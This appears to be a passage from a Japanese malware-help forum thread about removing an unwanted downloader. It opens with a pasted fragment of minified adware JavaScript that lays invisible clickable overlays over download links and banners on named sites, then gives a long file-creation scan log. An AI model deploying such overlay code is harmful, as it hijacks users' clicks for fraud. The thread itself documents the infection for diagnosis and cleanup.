e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}}};this[\"reeroms.co\"]=\r\nnew function(){this.init=function(){window.location.host.toLowerCase().indexOf(\"reeroms.co\")&&(window.__sdahfjkahfals3243Count=0,window.__sdahfjkahfals3243Int=setInterval(function(){for(var h=document.getElementsByTagName(\"a\"),e=0;e<h.length;e++){var k=\"undefined\"===typeof h[e].innerText?h[e].textContent:h[e].innerText,k=k.trim();if(\"Download\"===k||0==k.indexOf(\"Direct\")){var l=document.createElement(\"div\");l.style.width=\"100%\";l.style.height=\"100%\";l.style.position=\"absolute\";l.style.zIndex=\"9999\";\r\nl.style.top=\"0\";l.style.cursor=\"pointer\";var m=h[e].parentNode;m.style.position=\"relative\";m.appendChild(l);0==k.indexOf(\"Direct\")&&clearInterval(window.__sdahfjkahfals3243Int)}}40<window.__sdahfjkahfals3243Count++&&clearInterval(window.__sdahfjkahfals3243Int)},500))}};this[\"eneral-ebooks.co\"]=new function(){this.init=function(){if(-1<window.location.host.toLowerCase().indexOf(\"eneral-ebooks.co\"))for(var h=document.getElementsByTagName(\"iframe\"),e=0;e<h.length;e++){var k=h[e].parentNode;if(null!=\r\nk){var l=k.getAttribute(\"class\");null!=l&&-1<l.indexOf(\"banner-body\")&&(l=document.createElement(\"div\"),l.style.width=\"100%\",l.style.height=\"100%\",l.style.position=\"absolute\",l.style.zIndex=\"9999\",l.style.top=\"0\",l.style.cursor=\"pointer\",k.style.position=\"relative\",k.appendChild(l))}}}};this[\"stream2watch.me\"]=new function(){this.init=function(){-1<location.host.toLowerCase().indexOf(\"stream2watch.me\")&&(window.__z_tream2count=0,window.__z_tream2int=setInt
  • tarutaru
  • 2015/05/05 (Tue) 23:32:16
トピックを確認する 
Re: Ezdownloderをインストールしてしまいました。。。。

[2015/05/04 01:16:18 | 000,129,752 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2015/05/04 00:49:43 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2015/05/04 00:47:53 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
[2015/05/04 00:47:51 | 000,093,400 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2015/05/04 00:47:51 | 000,063,704 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mwac.sys
[2015/05/04 00:47:51 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes Anti-Malware
[2015/05/04 00:47:11 | 000,000,000 | ---D | C] -- C:\Users\kotaro\AppData\Roaming\Malwarebytes
[2015/05/04 00:46:24 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/05/04 00:46:22 | 000,025,816 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys
[2015/05/04 00:46:22 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2015/05/01 03:18:50 | 000,236,080 | ---- | C] (Trend Micro Inc.) -- C:\Windows\RegBootClean64.exe
[2015/05/01 01:19:43 | 000,000,000 | -H-D | C] -- C:\TMRescueDisk
[2015/05/01 01:16:45 | 000,000,000 | ---D | C] -- C:\Users\kotaro\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ウイルスバスター クラウド
[2015/05/01 01:15:36 | 000,106,296 | ---- | C] (Trend Micro Inc.) -- C:\Windows\SysNative\drivers\tmeevw.sys
[2015/05/01 01:15:17 | 000,305,832 | ---- | C] (Trend Micro Inc.) -- C:\Windows\SysNative\drivers\tmcomm.sys
[2015/05/01 01:15:17 | 000,121,944 | ---- | C] (Trend Micro Inc.) -- C:\Windows\SysNative\drivers\tmactmon.sys
[2015/05/01 01:15:17 | 000,093,664 | ---- | C] (Trend Micro Inc.) -- C:\Windows\SysNative\drivers\tmevtmgr.sys
[2015/05/01 01:15:10 | 000,106,296 | ---- | C] (Trend Micro Inc.) -- C:\Windows\SysNative\drivers\tmusa.sys
[2015/05/01 01:10:27 | 000,000,000 | ---D | C] -- C:\Program Files\Trend Micro
[2015/05/01 01:10:25 | 000,000,000 | ---D | C] -- C:\ProgramData\Trend Micro
[2015/05/01 01:01:07 | 000,000,000 | ---D | C] -- C:\Users\kotaro\AppData\Local\Trend Micro
[2015/05/01 00:59:13 | 000,000,000 | ---D | C] -- C:\Windows\SysWow64\drivers\AVG
[2015/05/01 00:35:40 | 000,000,000 | ---D | C] -- C:\Users\kotaro\AppData\Roaming\TuneUp Software
[2015/05/01 00:29:50 | 000,000,000 | ---D | C] -- C:\Users\kotaro\Desktop\トレンドマイクロ ウイルスバスター クラウド 1年版 ダウンロード版 Windows版(最新・3台版)
[2015/05/01 00:29:50 | 000,000,000 | ---D | C] -- C:\Users\kotaro\Documents\Amazon Downloader Logs
[2015/04/30 23:28:17 | 000,000,000 | ---D | C] -- C:\Users\kotaro\AppData\Roaming\Geek Uninstaller
[2015/04/29 22:07:07 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SegmentProlonger
[2015/04/29 22:06:31 | 000,000,000 | ---D | C] -- C:\ProgramData\17347531843110209982
[2015/04/29 09:39:11 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
[2015/04/29 09:37:49 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\iTunes
[2015/04/29 09:37:49 | 000,000,000 | ---D | C] -- C:\Program Files\iPod
[2015/04/29 09:37:48 | 000,000,000 | ---D | C] -- C:\Program Files\iTunes
[2015/04/29 09:37:48 | 000,000,000 | ---D | C] -- C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
[2015/04/24 18:54:59 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2015/04/24 18:34:55 | 000,000,000 | ---D | C] -- C:\ProgramData\NortonInstaller
[2015/04/24 18:33:53 | 000,000,000 | ---D | C] -- C:\Users\kotaro\AppData\Roaming\Nico Mak Computing
[2015/04/24 18:32:58 | 000,000,000 | ---D | C] -- C:\Users\kotaro\AppData\Local\MiniService
[2015/04/16 06:42:31 | 003,298,816 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wucltux.dll
[2015/04/16 06:42:31 | 000,696,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuapi.dll
[2015/04/16 06:42:31 | 000,566,784 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wuapi.dll
[2015/04/16 06:42:31 | 000,191,488 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuwebv.dll
[2015/04/16 06:42:31 | 000,173,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wuwebv.dll
[2015/04/16 06:42:31 | 000,135,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuauclt.exe
[2015/04/16 06:42:31 | 000,098,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wudriver.dll
[2015/04/16 06:42:31 | 000,092,672 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wudriver.dll
[2015/04/16 06:42:31 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\WinSetupUI.dll
[2015/04/16 06:42:31 | 000,037,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wups2.dll
[2015/04/16 06:42:31 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuapp.exe
[2015/04/16 06:42:31 | 000,035,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wups.dll
[2015/04/16 06:42:31 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wuapp.exe
[2015/04/16 06:42:31 | 000,029,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wups.dll
[2015/04/16 06:42:31 | 000,012,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wu.upgrade.ps.dll
[2015/04/16 06:42:08 | 001,111,552 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2015/04/16 06:42:08 | 000,957,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\appraiser.dll
[2015/04/16 06:42:08 | 000,726,528 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll
[2015/04/16 06:42:08 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\acmigration.dll
[2015/04/16 06:42:07 | 000,769,536 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\invagent.dll
[2015/04/16 06:42:07 | 000,419,840 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\devinv.dll
[2015/04/16 06:42:07 | 000,227,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2015/04/16 06:42:07 | 000,192,000 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepic.dll
[2015/04/16 06:42:01 | 000,404,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\gdi32.dll
[2015/04/16 06:41:54 | 005,557,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
[2015/04/16 06:41:53 | 003,920,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2015/04/16 06:41:53 | 001,727,904 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntdll.dll
[2015/04/16 06:41:53 | 001,163,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\kernel32.dll
[2015/04/16 06:41:53 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\KernelBase.dll
[2015/04/16 06:41:52 | 003,976,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2015/04/16 06:41:52 | 001,461,760 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\lsasrv.dll
[2015/04/16 06:41:52 | 000,503,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srcore.dll
[2015/04/16 06:41:52 | 000,362,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64win.dll
[2015/04/16 06:41:52 | 000,338,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\conhost.exe
[2015/04/16 06:41:52 | 000,309,760 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ncrypt.dll
[2015/04/16 06:41:52 | 000,296,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rstrui.exe
[2015/04/16 06:41:52 | 000,243,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64.dll
[2015/04/16 06:41:52 | 000,215,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winsrv.dll
[2015/04/16 06:41:52 | 000,136,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspicli.dll
[2015/04/16 06:41:52 | 000,112,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\smss.exe
[2015/04/16 06:41:52 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\auditpol.exe
[2015/04/16 06:41:52 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srclient.dll
[2015/04/16 06:41:52 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\auditpol.exe
[2015/04/16 06:41:52 | 000,043,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\csrsrv.dll
[2015/04/16 06:41:52 | 000,029,184 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\sspisrv.dll
[2015/04/16 06:41:52 | 000,028,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\secur32.dll
[2015/04/16 06:41:52 | 000,025,600 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\setup16.exe
[2015/04/16 06:41:52 | 000,016,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntvdm64.dll
[2015/04/16 06:41:52 | 000,014,336 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntvdm64.dll
[2015/04/16 06:41:52 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64cpu.dll
[2015/04/16 06:41:52 | 000,005,120 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-file-l1-1-0.dll
[2015/04/16 06:41:52 | 000,005,120 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-file-l1-1-0.dll
[2015/04/16 06:41:52 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wow32.dll
[2015/04/16 06:41:52 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-threadpool-l1-1-0.dll
[2015/04/16 06:41:52 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-sysinfo-l1-1-0.dll
[2015/04/16 06:41:52 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-sysinfo-l1-1-0.dll
[2015/04/16 06:41:52 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-synch-l1-1-0.dll
[2015/04/16 06:41:52 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-synch-l1-1-0.dll
[2015/04/16 06:41:52 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-rtlsupport-l1-1-0.dll
[2015/04/16 06:41:52 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-misc-l1-1-0.dll
[2015/04/16 06:41:52 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-xstate-l1-1-0.dll
[2015/04/16 06:41:52 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-util-l1-1-0.dll
[2015/04/16 06:41:52 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-string-l1-1-0.dll
[2015/04/16 06:41:52 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-string-l1-1-0.dll
[2015/04/16 06:41:52 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-rtlsupport-l1-1-0.dll
[2015/04/16 06:41:52 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-profile-l1-1-0.dll
[2015/04/16 06:41:52 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-profile-l1-1-0.dll
[2015/04/16 06:41:51 | 000,686,080 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\adtschema.dll
[2015/04/16 06:41:51 | 000,686,080 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\adtschema.dll
[2015/04/16 06:41:51 | 000,146,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msaudite.dll
[2015/04/16 06:41:51 | 000,146,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msaudite.dll
[2015/04/16 06:41:51 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msobjs.dll
[2015/04/16 06:41:51 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msobjs.dll
[2015/04/16 06:41:51 | 000,007,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\instnm.exe
[2015/04/16 06:41:51 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\apisetschema.dll
[2015/04/16 06:41:51 | 000,006,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\apisetschema.dll
[2015/04/16 06:41:51 | 000,006,144 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
[2015/04/16 06:41:51 | 000,006,144 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-security-base-l1-1-0.dll
[2015/04/16 06:41:51 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
[2015/04/16 06:41:51 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-processthreads-l1-1-0.dll
[2015/04/16 06:41:51 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-processthreads-l1-1-0.dll
[2015/04/16 06:41:51 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-misc-l1-1-0.dll
[2015/04/16 06:41:51 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-localregistry-l1-1-0.dll
[2015/04/16 06:41:51 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-localregistry-l1-1-0.dll
[2015/04/16 06:41:51 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-localization-l1-1-0.dll
[2015/04/16 06:41:51 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-localization-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-processenvironment-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-processenvironment-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-namedpipe-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-namedpipe-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-memory-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-memory-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-libraryloader-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-libraryloader-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-interlocked-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-heap-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-heap-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-io-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-io-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-interlocked-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-handle-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-handle-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-fibers-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-fibers-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-errorhandling-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-errorhandling-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-delayload-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-delayload-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-debug-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-debug-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-datetime-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-datetime-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-console-l1-1-0.dll
[2015/04/16 06:41:51 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-console-l1-1-0.dll
[2015/04/16 06:41:51 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\user.exe
[2015/04/16 06:41:43 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msxml3r.dll
[2015/04/16 06:41:43 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msxml3r.dll
[2015/04/16 06:41:38 | 000,720,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe
[2015/04/16 06:41:38 | 000,114,688 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe
[2015/04/16 06:41:38 | 000,077,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll
[2015/04/16 06:41:38 | 000,076,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2015/04/16 06:41:38 | 000,064,000 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll
[2015/04/16 06:41:38 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
[2015/04/16 06:41:38 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll
[2015/04/16 06:41:38 | 000,047,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll
[2015/04/16 06:41:38 | 000,034,304 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll
[2015/04/16 06:41:38 | 000,030,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2015/04/16 06:41:37 | 002,052,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2015/04/16 06:41:37 | 000,710,144 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll
[2015/04/16 06:41:37 | 000,620,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll
[2015/04/16 06:41:37 | 000,115,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2015/04/16 06:41:37 | 000,062,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2015/04/16 06:41:37 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll
[2015/04/16 06:41:36 | 002,125,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2015/04/16 06:41:36 | 000,968,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe
[2015/04/16 06:41:36 | 000,801,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll
[2015/04/16 06:41:36 | 000,800,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll
[2015/04/16 06:41:36 | 000,478,208 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2015/04/16 06:41:36 | 000,316,928 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll
[2015/04/16 06:41:36 | 000,066,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll
[2015/04/16 06:41:35 | 001,155,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll
[2015/04/16 06:41:35 | 000,633,856 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll
[2015/04/16 06:41:35 | 000,490,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll
[2015/04/16 06:41:35 | 000,340,992 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\html.iec
[2015/04/16 06:41:35 | 000,168,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll
[2015/04/16 06:41:35 | 000,144,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe
[2015/04/16 06:41:34 | 006,025,216 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll
[2015/04/16 06:41:34 | 001,359,360 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll
[2015/04/16 06:41:34 | 000,814,080 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll
[2015/04/16 06:41:34 | 000,584,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll
[2015/04/16 06:41:34 | 000,092,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2015/04/16 06:41:33 | 000,417,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\html.iec
[2015/04/16 06:41:33 | 000,199,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll
[2015/04/16 06:41:33 | 000,088,064 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll
[2015/04/16 06:41:26 | 000,079,360 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\clfsw32.dll
[2015/04/16 06:41:26 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\clfsw32.dll
[2011/12/28 23:40:00 | 001,268,560 | ---- | C] (Adobe Systems Incorporated) -- C:\Users\kotaro\PremiereElements_10_Content_HD1_LS15.exe
[6 C:\Windows\SysWow64\*.tmp files -> C:\Windows\SysWow64\*.tmp -> ]
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
[1 C:\Users\kotaro\Documents\*.tmp files -> C:\Users\kotaro\Documents\*.tmp -> ]

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/05/05 23:14:00 | 000,000,690 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/05/05 23:03:00 | 000,000,626 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/05/05 22:26:00 | 000,000,704 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-2455232710-2752153166-228219264-1000UA.job
[2015/05/05 21:14:00 | 000,000,686 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/05/05 11:26:00 | 000,000,652 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-2455232710-2752153166-228219264-1000Core.job
[2015/05/05 10:14:02 | 000,025,744 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015/05/05 10:14:02 | 000,025,744 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015/05/05 10:05:40 | 005,477,816 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2015/05/05 09:54:03 | 000,000,350 | ---- | M] () -- C:\Windows\tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job
